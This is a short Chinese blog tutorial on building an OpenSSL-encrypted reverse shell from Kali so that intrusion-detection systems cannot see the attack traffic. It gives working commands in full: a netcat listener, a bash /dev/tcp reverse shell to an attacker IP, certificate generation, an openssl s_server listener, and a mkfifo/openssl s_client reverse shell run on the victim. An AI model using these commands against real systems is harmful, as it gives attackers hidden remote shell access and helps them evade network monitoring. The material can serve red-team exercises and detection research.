1. 程式人生 > 其它 >流量加密-Kali使用Openssl反彈shell

流量加密-Kali使用Openssl反彈shell

Kali使用Openssl反彈shell

前言

之前在護網的時候,如果流量中有明文的敏感資訊,譬如攻擊特徵,是很容易被IDS檢測出來的,此時紅隊的攻擊行為就會暴露。這是非常危險的一件事。今天我們通過本篇部落格來完成使用Openssl反彈shelll來加密流量。

正文

普通反彈shell

首先我們來看不使用流量加密反彈shell,通過wireshark可以明顯撲捉到攻擊特徵。

首先kali開啟NC監聽:

nc -lvvp 8080

然後在受害主機上反彈shell

bash -c 'exec bash -i &>/dev/tcp/192.168.37.134/8080 <&1'

在wireshark進行抓包,可以看到獲取到的敏感資訊是未加密的,這是會被IDC捕捉到的。

Openssl反彈shell

Openssl的百度百科簡介:

計算機網路上,OpenSSL是一個開放原始碼軟體包,應用程式可以使用這個包來進行安全通訊,避免竊聽,同時確認另一端連線者的身份。這個包廣泛被應用在網際網路的網頁伺服器上。

Openssl的特點是使用安全通道、並且開源。Openssl實現的SSL協議是存粹的SSL協議,沒有和其他協議結合在一起。

接下來我們使用OpenSSL對流量進行加密

首先Kali攻擊機上需要生成金鑰:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -node

然後再kali攻擊機上監聽指定埠,譬如8082:

openssl s_server -quiet -key key.pem -cert cert.pem -port 8082

接著在受害主機上以openssl的形式反彈shell,注意指定IP和埠

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.37.134:8082 > /tmp/s;

可以看到kali上順利回彈了shell,

並且檢視敏感檔案時,流量是加密的